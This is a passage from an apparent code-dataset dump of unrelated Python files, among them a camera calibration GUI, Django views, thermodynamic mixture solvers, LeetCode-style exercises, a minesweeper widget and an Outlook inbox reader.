def create_calibrate_cameras_button(self):\n calibrate_button = QtWidgets.QPushButton('Calibrate Cameras', self)\n calibrate_button.resize(150, 40)\n calibrate_button.clicked.connect(self.calibrate_set)\n\n return calibrate_button\n\n def create_calibration_images_button(self):\n take_calibration_images = QtWidgets.QPushButton('Get Calibration Set', self)\n take_calibration_images.setCheckable(True)\n take_calibration_images.resize(150, 40)\n\n take_calibration_images.clicked.connect(self.toggle_take_calibration_images)\n\n return take_calibration_images\n\n def create_build_cameras_button(self):\n build_cameras_button = QtWidgets.QPushButton('Show Cameras', self)\n build_cameras_button.resize(150, 40)\n build_cameras_button.clicked.connect(self.show_cameras)\n\n return build_cameras_button\n\n def calibrate_set(self):\n stereo_calibrator = CalibrateStereoCamerasFromChessboard()\n stereo_calibrator.execute(self.parent.combobox_selector.currentText())\n\n def show_cameras(self):\n calibration_file = self.parent.configuration.general_configuration.sets_folder + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml'\n reconstructor = RecontructCameras(calibration_file)\n reconstructor.run()\n\n def toggle_take_calibration_images(self):\n self.calibration_images_taken = 0\n self.take_calibration_images = not self.take_calibration_images\n\n def should_take_calibration_images(self):\n return self.take_calibration_images\n\n def create_reconstruction_button(self):\n reconstruction = QtWidgets.QWidget()\n reconstruction_layout = QtWidgets.QHBoxLayout()\n reconstruction_layout.setContentsMargins(0, 0, 0, 0)\n\n reconstruction_button = QtWidgets.QPushButton('Rec. 
Image', self)\n reconstruction_button.clicked.connect(self.reconstruct_from_images)\n images = [str(number) for number in range(6)]\n self.reconstruction_image_selector = QtWidgets.QComboBox(self)\n self.reconstruction_image_selector.addItems(images)\n\n reconstruction_layout.addWidget(reconstruction_button)\n reconstruction_layout.addWidget(self.reconstruction_image_selector)\n reconstruction.setLayout(reconstruction_layout)\n\n return reconstruction\n\n def create_reconstruction_from_video_button(self):\n reconstruction_button = QtWidgets.QPushButton('Rec. Video', self)\n reconstruction_button.move(1090, 200)\n reconstruction_button.resize(150, 40)\n reconstruction_button.clicked.connect(self.reconstruct_from_video)\n\n return reconstruction_button\n\n def create_take_photo_button(self):\n take_photo_button = QtWidgets.QPushButton('Take Photo', self)\n take_photo_button.move(925, 150)\n take_photo_button.resize(150, 40)\n take_photo_button.clicked.connect(self.take_photo)\n\n return take_photo_button\n\n def create_video_record_button(self):\n record_video_button = QtWidgets.QPushButton('Record Video', self)\n record_video_button.setCheckable(True)\n record_video_button.move(1090, 150)\n record_video_button.resize(150, 40)\n record_video_button.clicked.connect(self.record_video)\n\n return record_video_button\n\n def take_calibration_image(self):\n self.frames_between_calibration_images += 1\n if self.frames_between_calibration_images == 100:\n if not os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images'):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images')\n\n\n print('Take Dual Image ' + str(self.calibration_images_taken))\n\n print('::Write Left Image::')\n im_left = self.parent.cameras[0].get_image_hd()\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images/left_image_' + str(self.calibration_images_taken) + '.png',\n im_left)\n\n print('::Write Right Image::')\n im_right = self.parent.cameras[1].get_image_hd()\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images/right_image_' + str(self.calibration_images_taken) + '.png',\n im_right)\n self.frames_between_calibration_images = 0\n self.update_calibration_images_amount()\n\n def update_calibration_images_amount(self):\n self.calibration_images_taken += 1\n self.calibration_information.set_calibration_images_taken(self.calibration_images_taken)\n\n def record_video(self):\n if not os.path.exists('bin/Videos/' + self.textbox.text() + '_video'):\n os.makedirs('bin/Videos/' + self.textbox.text() + '_video')\n\n if self.video_recorder_1 is None:\n print('->Create video recorder<-')\n self.video_recorder_1 = cv2.VideoWriter(\n 'bin/Videos/' + self.textbox.text() + '_video/video_1.avi',\n cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n 10,\n (1280, 720)\n )\n\n self.video_recorder_2 = cv2.VideoWriter(\n 'bin/Videos/' + self.textbox.text() + '_video/video_2.avi',\n cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n 10,\n (1280, 720)\n )\n\n if self.record_video_button.isChecked() is False:\n self.video_recorder_1.release()\n self.video_recorder_2.release()\n\n self.video_recorder_1 = None\n self.video_recorder_2 = None\n\n self.should_record_video = self.record_video_button.isChecked()\n\n def take_photo(self):\n if not os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText()):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText())\n\n if not 
os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText() + '/images'):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText() + '/images')\n\n #self.photos_taken += 1\n #print('Take Dual Image ' + str(self.photos_taken))\n\n print('::Write Left Image::')\n im_left = self.parent.cameras[0].get_image_hd()\n # im_rgb_left = cv2.cvtColor(cv2.resize(im_left,(1280,720)), cv2.COLOR_BGR2RGB)\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/images/left_image_2.png', im_left)\n\n print('::Write Right Image::')\n im_right = self.parent.cameras[1].get_image_hd()\n # im_rgb_right = cv2.cvtColor(cv2.resize(im_right,(1280,720)), cv2.COLOR_BGR2RGB)\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/images/right_image_2.png', im_right)\n\n self.images_counter.setNum(self.photos_taken)\n\n def reconstruct_from_video(self):\n video_reconstructor = ReconstructionFromVideo(\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/videos/video_1.avi',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/videos/video_2.avi',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml'\n )\n video_reconstructor.run()\n\n def reconstruct_from_images(self):\n images_reconstructor = ReconstructionFromImages(\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/images/left_image_' + self.reconstruction_image_selector.currentText() + '.png',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/images/right_image_' + self.reconstruction_image_selector.currentText() + '.png',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/camera_A_calibration.yml',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/camera_B_calibration.yml',\n self\n )\n images_reconstructor.run()\n","sub_path":"code/src/vision/presentation/user_interface/partials/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"9058997","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('left.jpg',0) #queryimage # left image\nimg2 = cv2.imread('right.jpg',0) #trainimage # right image\n\nsift = cv2.xfeatures2d.SIFT_create()\nsurf = cv2.xfeatures2d.SURF_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n# FLANN parameters\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50)\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\nmatches = flann.knnMatch(des1,des2,k=2)\n\ngood = []\npts1 = []\npts2 = []\n\n# ratio test as per Lowe's paper\nfor i,(m,n) in enumerate(matches):\n if m.distance < 0.8*n.distance:\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n\n\npts1 = np.int32(pts1)\npts2 = np.int32(pts2)\n\nprint(pts1)\nprint(type(pts1))\n\nF, mask = cv2.findFundamentalMat(pts1,pts2,cv2.FM_LMEDS)\nprint(F)\n# We select only inlier points\npts1 = pts1[mask.ravel()==1]\npts2 = pts2[mask.ravel()==1]","sub_path":"HW2/epi_test.py","file_name":"epi_test.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"258505501","text":"import 
logging\nimport time\nfrom common.config import Config\nfrom common.globalmanager import GlobalManager\nimport os\n\nconfig = Config.getConfig()\nrq = time.strftime('%Y%m%d_%H%M', time.localtime()) + '.log'\nrootPath = GlobalManager().get_value('rootPath')\n\nclass Logger(object):\n\n def __init__(self, name):\n self.name = name\n self.logPath = config['log']['path']\n self.logger = logging.getLogger(self.name)\n self.logger.setLevel(logging.INFO)\n # self.streamHandler = logging.StreamHandler()\n self.fileHandler = logging.FileHandler(os.path.join(rootPath,self.logPath,rq), 'a',encoding='utf-8')\n self.formatter = logging.Formatter(config['log']['fmt'])\n # self.streamHandler.setLevel(logging.INFO)\n self.fileHandler.setLevel(logging.INFO)\n self.fileHandler.setFormatter(self.formatter)\n # self.streamHandler.setFormatter(self.formatter)\n # self.logger.addHandler(self.streamHandler)\n self.logger.addHandler(self.fileHandler)\n\n def getLogger(self):\n return self.logger","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"119581110","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import permission_required\nfrom django.shortcuts import render, redirect\nfrom products.models import Pc, Products, Pc_character\nfrom products.forms import pc_form, pcs_form\n\n\ndef database_pc(request):\n list_pc = Pc.objects.all()\n return render(request, 'pc/pc_view.html', {'lists': list_pc})\n\n\ndef detail_pc(request, id):\n item = Products.objects.get(id=id)\n item_pc = Pc_character.objects.all().filter(pcs__products__id=id)\n return render(request, 'pc/pc_detail.html', {'item': item, 'item_pc': item_pc})\n\n\n@permission_required('products.add_pc_character')\ndef create_pc(request):\n if request.method == 'POST':\n form = pc_form(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n img_obj = form.instance\n messages.info(request, 'Save data, go to pc.')\n return render(request, 'pc/pc_create.html', {'form': form, 'img_obj': img_obj})\n else:\n form = pc_form()\n return render(request, 'pc/pc_create.html', {'form': form})\n\n\n@permission_required('products.add_pc')\ndef create_pcs(request):\n if request.method == 'POST':\n form_p = pcs_form(request.POST, request.FILES)\n if form_p.is_valid():\n form_p.save()\n img_obj = form_p.instance\n messages.info(request, 'Save data, press the next button.')\n return render(request, 'pc/pcs_create.html', {'form_p': form_p, 'img_obj': img_obj})\n else:\n form_p = pcs_form()\n return render(request, 'pc/pcs_create.html', {'form_p': form_p})\n\n\n@permission_required('products.change_pc_character')\ndef update_pc(request, id):\n pc = Pc_character.objects.get(pcs__products_id=id)\n update_form = pc_form(request.POST or None, instance=pc)\n if update_form.is_valid():\n update_form.save()\n messages.info(request, 'update data to the pc.')\n return redirect('/products/update/pc/'+id)\n name_pc = Pc.objects.get(products_id=id)\n\n context = {\n 'update_form': update_form,\n 'name': name_pc\n }\n return render(request, 'pc/pc_update.html', context)\n\n\n@permission_required('products.delete_pc')\ndef delete_pc(request, id):\n pc_get = Pc.objects.get(id=id)\n if request.method == 'POST':\n pc_get.delete()\n messages.info(request, 'Delete data on the database.')\n return redirect('view_pc')\n # the original call omitted the template argument; 'pc/pc_delete.html' is an assumed name following the other templates here\n return render(request, 'pc/pc_delete.html', {'pc': 
pc_get})\n","sub_path":"products/views/views_pc.py","file_name":"views_pc.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"365894243","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/val/Projects/workon/mpro/doozdev/backend/restful-backend/apps/geoware/views/altname.py\n# Compiled at: 2017-01-27 09:53:00\n# Size of source mod 2**32: 574 bytes\nfrom dal import autocomplete\nfrom ..models import Altname\n\nclass AltnameAutocompleteView(autocomplete.Select2QuerySetView):\n __doc__ = '\\n Altname Autocomplete view.\\n '\n\n def get_queryset(self):\n if not self.request.user.is_authenticated():\n return Altname.objects.none()\n qs = Altname.objects.all()\n ref_geoname_id = self.forwarded.get('geoname_id', None)\n if ref_geoname_id:\n qs = qs.filter(ref_geoname_id=ref_geoname_id)\n if self.q:\n qs = qs.filter(name__istartswith=self.q)\n return qs","sub_path":"pycfiles/django-geoware-0.1.0.tar/altname.cpython-34.py","file_name":"altname.cpython-34.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"375314195","text":"#!/usr/bin/env python\n#title :trace-editor.py\n#description :process a trace disk\n#author :Vincentius Martin\n#date :-\n#version :0.1\n#usage :python trace-editor.py\n#notes :\n#python_version :2.7.5+\n#==============================================================================\n\nfrom random import randint\n\n# input: request list (list), modify the size x times (float)\ndef resize(reqlist, times):\n for request in reqlist:\n request[3] = ('%f' % (times * float(request[3]))).rstrip('0').rstrip('.')\n return reqlist\n\n# input: request list (list), modify the size x rate times (float)\ndef modifyRate(reqlist, rate):\n i = 0\n while i < len(reqlist):\n #if float(reqlist[i][0]) * rate > 300000:\n # del reqlist[i:len(reqlist)]\n # break\n reqlist[i][0] = '%.3f' % (rate * float(reqlist[i][0]))\n i += 1\n return reqlist\n\n#interval: in ms; size in KB\ndef insertIO(reqlist,size,interval,iotype):\n insert_time = interval\n maxoffset = int(max(reqlist, key=lambda x: int(x[2]))[2])\n i = 0\n while i < len(reqlist):\n if float(reqlist[i][0]) > insert_time: #7190528,7370752\n reqlist.insert(i,['%.3f' % insert_time,str(0),str(randint(0,maxoffset)),str(size * 2),str(iotype)])\n insert_time += interval\n i += 1\n i += 1\n return reqlist\n \ndef printRequestList(requestlist, filename):\n out = open(\"out/\" + filename + \"-modified.trace\" , 'w')\n for elm in requestlist:\n out.write(str(elm[0]) + \" \" + str(elm[1]) + \" \" + str(elm[2]) + \" \" + str(elm[3]) + \" \" + str(elm[4])+\"\\n\")\n out.close()\n\n","sub_path":"utils/iodaExp/traceExp/scripts/trace_modifier.py","file_name":"trace_modifier.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"567541296","text":"from plu_diffusion.ideal_binay_mixture_fixed_temperature import (GAS_MOLAR_FRACTION,\n LIQUID_MOLAR_FRACTION)\nfrom scipy.optimize import fsolve\n\nclass IdealBinaryMixtureFixedPressure(object):\n '''\n '''\n def __init__(self, component_one, component_two, pressure):\n self.components = [component_one, component_two]\n self.pressure = pressure\n \n \n def calculate_first_component_gas_molar_fraction(self, 
temperature):\n y1 = fsolve(\n self._gas_molar_fraction_residual_equation_from_temperature,\n 0.0,\n args=(temperature)\n ) \n return y1[0]\n \n\n def _gas_molar_fraction_residual_equation_from_temperature(\n self,\n component_one_gas_molar_fraction_guess,\n temperature,\n ): \n '''\n '''\n p = self.pressure\n T = temperature\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n y_1 = component_one_gas_molar_fraction_guess\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n \n \n \n def calculate_saturation_temperature(\n self,\n component_one_molar_fraction,\n molar_fraction_type=GAS_MOLAR_FRACTION,\n ): \n '''\n '''\n temperature_guess = (\n self.components[0].calculate_saturation_temperature(self.pressure))\n residual_function = None\n if molar_fraction_type == GAS_MOLAR_FRACTION:\n residual_function = (\n self._temperature_equation_residual_with_gas_molar_fraction)\n elif molar_fraction_type == LIQUID_MOLAR_FRACTION:\n residual_function = (\n self._temperature_equation_residual_with_liquid_molar_fraction)\n saturation_temperature = fsolve(\n func=residual_function,\n x0=temperature_guess,\n args=(component_one_molar_fraction)\n )\n return saturation_temperature[0]\n \n def _temperature_equation_residual_with_gas_molar_fraction(\n self,\n temperature_guess,\n component_one_gas_molar_fraction,\n ): \n '''\n '''\n p = self.pressure\n T = temperature_guess\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n y_1 = component_one_gas_molar_fraction\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n def _temperature_equation_residual_with_liquid_molar_fraction(\n self,\n temperature_guess,\n component_one_liquid_molar_fraction,\n ): \n '''\n '''\n p = self.pressure\n T = temperature_guess\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n \n x_1 = component_one_liquid_molar_fraction\n x_2 = 1.0 - x_1\n y_1 = x_1 * (psat_1 / p)\n y_2 = 1.0 - y_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n","sub_path":"src/plu_diffusion/ideal_binay_mixture_fixed_pressure.py","file_name":"ideal_binay_mixture_fixed_pressure.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"180230573","text":"intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]]\nnewInterval = [4,8]\nclass Solution:\n def insert(self, intervals, newInterval):\n left, right = newInterval\n placed = False\n ans = list()\n for li, ri in intervals:\n if li > right:\n # entirely to the right of the new interval, no overlap\n if not placed:\n ans.append([left, right])\n placed = True\n ans.append([li, ri])\n elif ri < left:\n # entirely to the left of the new interval, no overlap\n ans.append([li, ri])\n else:\n # overlaps the new interval; compute their union\n left = min(left, li)\n right = max(right, ri)\n\n if not placed:\n ans.append([left, right])\n return ans\n # first attempt, kept for reference -- buggy: when the new interval does not\n # touch the tail of the list, the result is left unsorted and unmerged\n # ans=[]\n # for item in intervals:\n # ans.append(item)\n # while ans[-1]!=newInterval and ans[-1][0]<=newInterval[1] and ans[-1][1]>=newInterval[0]:\n # temp=ans.pop()\n # newInterval=[min(temp[0],newInterval[0]),max(temp[1],newInterval[1])]\n # while ans[-1][0]==newInterval[0]:\n # ans.pop()\n # ans.append(newInterval)\n # return ans\nx=Solution()\nprint(x.insert(intervals,newInterval))","sub_path":"57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"501851357","text":"\"\"\" Write a function that checks whether a number is prime.\"\"\"\n\ndef asal_sayi(number):\n sayac=0\n for i in range(2,number):\n if number%i==0 :\n sayac+=1\n if sayac!=0:\n return \"the number is not prime\"\n return \"the number is prime\"\n\nprint(asal_sayi(24))\n\n\n","sub_path":"Asal Sayi fonksiyonu.py","file_name":"Asal Sayi fonksiyonu.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"316888854","text":"#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] Two Sum\n#\n\n# @lc code=start\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n lens = len(nums)\n j=-1\n for i in range(1,lens):\n temp = nums[:i]\n if (target - nums[i]) in temp:\n j = temp.index(target - nums[i])\n break\n if j>=0:\n return [j,i]\n# @lc code=end\n\n","sub_path":".leetcode/1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"347670767","text":"\"\"\"Exercise 31:\nRead a number and generate Pi with the given number of decimal places. Put a limit on the number of decimal places!\n\"\"\"\n\nfrom decimal import getcontext, Decimal\n\n\ndef pi(digitos_desejados: int):\n i = 1 # iteration counter\n\n # add two to the size, to account for\n # the leading \"3\" of the numeric value and the fact that the last\n # digit is always an approximation\n tamanho = digitos_desejados + 2\n\n # set the precision to the stipulated size\n getcontext().prec = tamanho\n # disable rounding in the algorithm, since\n # the number already comes out correct and needs no rounding\n getcontext().rounding = \"ROUND_FLOOR\"\n\n # >> The Gauss-Legendre algorithm starts here <<\n # initial values of the four variables\n a0 = Decimal(1)\n b0 = Decimal(1 / Decimal(2).sqrt())\n t0 = Decimal(1 / 4)\n p0 = Decimal(1)\n\n # the number of correct digits equals the number of iterations * 2\n # loop while the stipulated size exceeds the number of correct digits\n while i * 2 < tamanho:\n # update the variables from the initial OR previous values\n a1 = Decimal((a0 + b0) / 2)\n b1 = Decimal(a0 * b0).sqrt()\n t1 = Decimal(t0 - p0 * ((a0 - a1) ** 2))\n p1 = Decimal(2 * p0)\n\n # replace the initial/previous values with the new ones\n a0 = a1\n b0 = b1\n t0 = t1\n p0 = p1\n\n i += 1\n\n # Pi equals the defined formula\n pi = Decimal(((a1 + b1) ** 2) / (4 * t1))\n # since the last digit is always approximate, compute 1 more than requested\n # and strip it with the format() function,\n # giving n significant digits\n return format(pi, f\".{tamanho - 1}g\")\n\n","sub_path":"Janeiro/031-Enésimo-Dígito-de-Pi.py","file_name":"031-Enésimo-Dígito-de-Pi.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"221520630","text":"from PySide2.QtWidgets import QFrame\nfrom PySide2.QtGui import QPainter, QPixmap\nfrom PySide2.QtCore import Qt, QRect, QPoint\n\nfrom game_controller import GameController\n\n\nclass Playground(QFrame):\n def __init__(self, controller):\n QFrame.__init__(self)\n self.game = controller\n self.mine_image = QPixmap(\"images/mine.png\")\n
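 # sprite images: the clicked mine is drawn on red, flags mark suspected cells, and the raised face is an unopened cell\n 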
self.mine_red_image = QPixmap(\"images/mine_red.png\")\n self.flag_image = QPixmap(\"images/flag.png\")\n self.cell_raised_image = QPixmap(\"images/cell_raised.png\")\n\n controller.gameReset.connect(self.repaint)\n self.reset()\n\n def paintEvent(self, paintEvent):\n # let QFrame to draw its background first\n QFrame.paintEvent(self, paintEvent)\n # init painter to start drawing on current widget surface\n painter = QPainter(self)\n # translate is mandatory since frame has a bevel\n painter.translate(self.lineWidth(), self.lineWidth())\n # render cells\n for i in range(GameController.CELL_COUNT):\n for j in range(GameController.CELL_COUNT):\n cell_size = GameController.CELL_SIZE\n rect = QRect(i*cell_size, j*cell_size, cell_size, cell_size)\n self._draw_cell(painter, rect, self.game.cells[i][j])\n\n def mousePressEvent(self, mouseEvent):\n # first check whether the click position is on\n # the bevel and not a cell and ignore it in that case\n if self._clicked_on_bevel(mouseEvent.pos()):\n print(\"clicked on bevel\")\n return\n # adjust position by bevel size\n pos = mouseEvent.pos() - QPoint(self.lineWidth(), self.lineWidth())\n i = pos.x() // GameController.CELL_SIZE\n j = pos.y() // GameController.CELL_SIZE\n # due to imperfect bevel size there might be one pixel on and off\n # that causes the index go beyond the limit. we simply treat it as clicked on bevel\n if i == GameController.CELL_COUNT or j == GameController.CELL_COUNT:\n print(\"clicked on bevel\")\n return\n cell = self.game.cells[i][j]\n # check if clicked on already opened cell\n if cell.open:\n return\n if mouseEvent.button() == Qt.LeftButton:\n if not cell.flag: # if flag is set, don't do anything\n if cell.mine:\n cell.open = True\n cell.current = True\n print(\"boom!\")\n self._open_all_mines()\n self.game.stop_game(False)\n else:\n # recursively open cells around current one\n self.game.open_cells_recursively(i, j)\n cell.open = True\n else:\n if not cell.open:\n if cell.flag: # if flag already set, remote it\n cell.flag = False\n self.game.set_flags_count(self.game.flags + 1)\n else: # otherwise set the flag\n if self.game.flags > 0:\n cell.flag = True\n self.game.set_flags_count(self.game.flags - 1)\n # call parent widget mouse click method\n QFrame.mousePressEvent(self, mouseEvent)\n # repaint the widget\n self.update()\n\n def _draw_cell(self, painter, rect, cell):\n painter.save()\n if not cell.open:\n painter.drawPixmap(rect.x(), rect.y(), self.cell_raised_image)\n if cell.flag:\n sz = (rect.size() - self.flag_image.size())\n x = sz.width() // 2\n y = sz.height() // 2\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.flag_image)\n painter.setPen(Qt.black)\n else:\n painter.fillRect(rect, Qt.lightGray)\n if cell.mine:\n sz = (rect.size() - self.mine_image.size())\n x = sz.width() // 2\n y = sz.height() // 2\n if cell.current:\n painter.fillRect(rect, Qt.red)\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.mine_red_image)\n else:\n painter.drawPixmap(rect.x() + x, rect.y() + y, self.mine_image)\n else:\n if cell.border != 0:\n # draw number\n font = painter.font()\n font.setPixelSize(rect.height())\n painter.setFont(font)\n painter.setPen(Qt.blue)\n painter.drawText(rect, Qt.AlignHCenter | Qt.AlignVCenter, str(cell.border))\n painter.setPen(Qt.gray)\n painter.drawRect(rect.adjusted(0, 0, -1, -1))\n painter.restore()\n\n def _clicked_on_bevel(self, pos):\n bevel_width = self.lineWidth() + 2\n inside_hor_edge = pos.x() <= bevel_width or pos.x() >= self.width() - bevel_width\n inside_ver_edge = pos.y() <= 
bevel_width or pos.y() >= self.height() - bevel_width\n return inside_hor_edge or inside_ver_edge\n\n def _open_all_mines(self):\n for i in range(GameController.CELL_COUNT):\n for j in range(GameController.CELL_COUNT):\n if self.game.cells[i][j].mine:\n self.game.cells[i][j].open = True\n\n def reset(self):\n self.game.restart_game()\n","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"227990654","text":"#!/usr/bin/python\r\n\"\"\"Script to fetch email from outlook.\"\"\"\r\nimport os\r\nfrom win32com.client import Dispatch\r\nimport win32com.client\r\ndef extract(count):\r\n \"\"\"Get emails from outlook.\"\"\"\r\n items = []\r\n outlook = win32com.client.Dispatch(\"Outlook.Application\").GetNamespace(\"MAPI\")\r\n inbox = outlook.GetDefaultFolder(6) # \"6\" refers to the inbox\r\n messages = inbox.Items\r\n message = messages.GetFirst()\r\n i = 0\r\n while message:\r\n try:\r\n # build the record in a separate dict so the Outlook item\r\n # bound to `message` is not overwritten inside the loop\r\n item = dict()\r\n item[\"Subject\"] = getattr(message, \"Subject\", \"\")\r\n item[\"SentOn\"] = getattr(message, \"SentOn\", \"\")\r\n item[\"EntryID\"] = getattr(message, \"EntryID\", \"\")\r\n item[\"Sender\"] = getattr(message, \"Sender\", \"\")\r\n item[\"Size\"] = getattr(message, \"Size\", \"\")\r\n item[\"Body\"] = getattr(message, \"Body\", \"\")\r\n items.append(item)\r\n except Exception as ex:\r\n print(\"Error processing mail\", ex)\r\n i += 1\r\n if i < count:\r\n message = messages.GetNext()\r\n else:\r\n return items\r\n return items\r\ndef show_message(items):\r\n \"\"\"Show the messages.\"\"\"\r\n items.sort(key=lambda tup: tup[\"SentOn\"])\r\n for i in items:\r\n print(i[\"SentOn\"], i[\"Subject\"])\r\ndef main():\r\n \"\"\"Fetch and display top message.\"\"\"\r\n items = extract(5)\r\n show_message(items)\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"alert-email/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"531445271","text":"from django.urls import path\nfrom .views import LogInView, LogOutView, SignUpView\n\n\napp_name = \"users_auth\"\n\nurlpatterns = [\n path('login/', LogInView.as_view(), name='login'),\n path('logout/', LogOutView.as_view(), name='logout'),\n path('register/', SignUpView.as_view(), name='register'),\n]","sub_path":"users_auth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"290540391","text":"import pandas as pd\n\ndef getARFFData(filename='iris.arff') :\n with open(filename) as rest :\n lines = rest.readlines()\n\n attrs = [line.strip('\\n') for line in lines if line.lower().startswith('@attribute')]\n attrNames = [line.strip('\\n').split()[1] for line in lines if line.lower().startswith('@attribute')]\n dataIndex = lines.index('@data\\n')\n data = [line.strip('\\n').split(',') for line in lines[dataIndex+1:]]\n\n ### now let's make the pandas dataframe\n df = pd.DataFrame(data, columns=attrNames)\n\n ## let's make a dictionary that maps attribute names to possible values.\n attributeDict = {}\n for a in attrs :\n name = a.split()[1]\n vals = a[a.find('{')+1:a.find('}')].split(', ')\n attributeDict[name] = vals\n return df, 
attributeDict\n\n","sub_path":"readARFF.py","file_name":"readARFF.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"150524648","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 21 11:22:13 2019\n\n@author: augustocbx\n\"\"\"\n\nentradas = [-1, 7, 5]\npesos = [0.8, 0.1, 0]\n\ndef soma (e, p):\n s = 0\n for i in range(3):\n #print(entradas[i])\n #print(pesos[i])\n s += e[i] * p[i]\n return s\n \ns = soma(entradas, pesos)\n\ndef stepFunction(soma):\n if(soma >= 1):\n return 1\n return 0\n\nr = stepFunction(s)","sub_path":"perceptron1.py","file_name":"perceptron1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"19537258","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/. */\n\n# Authors:\n# Michael Berg-Mohnicke \n#\n# Maintainers:\n# Currently maintained by the authors.\n#\n# This file has been created at the Institute of\n# Landscape Systems Analysis at the ZALF.\n# Copyright (C: Leibniz Centre for Agricultural Landscape Research 